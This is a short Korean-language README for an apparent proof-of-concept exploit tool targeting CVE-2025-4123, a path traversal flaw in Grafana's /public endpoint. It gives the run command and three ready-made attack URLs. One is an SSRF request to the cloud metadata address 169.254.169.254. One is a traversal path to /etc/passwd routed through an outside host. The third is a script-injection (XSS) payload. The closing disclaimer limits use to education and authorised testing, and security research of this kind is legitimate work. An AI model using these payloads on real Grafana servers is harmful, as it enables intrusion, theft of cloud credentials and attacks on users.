
CVE-2025-4123 - Grafana 도구
mitsec 개발
이것은 Grafana의 /public 엔드포인트에서 발생하는 심각한 경로 탐색 취약점인 CVE-2025-4123에 대한 개념 증명(PoC) 익스플로잇 도구입니다. 이 익스플로잇은 다음을 허용합니다:
다음과 같이 인코딩된 경로를 부적절하게 처리하는 /public/ 엔드포인트가 있는 Grafana 인스턴스:
/public/..%2F%5coast.pro%2F%3f%2F..%2F..
python3 cve_2025_4123_exploit_mitsec_final.py
그런 다음 원하는 모드를 선택하세요:
169.254.169.254와 같은 내부 서비스/etc/passwd와 같은 파일 읽기[*] SSRF URL: http://127.0.0.1:3000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
[*] LFI URL: http://127.0.0.1:3000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
[*] XSS URL: http://127.0.0.1:3000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E
이 코드는 교육 및 승인된 테스트 목적으로만 제공됩니다. 동의 없이 시스템에 무단 사용하는 것은 불법입니다.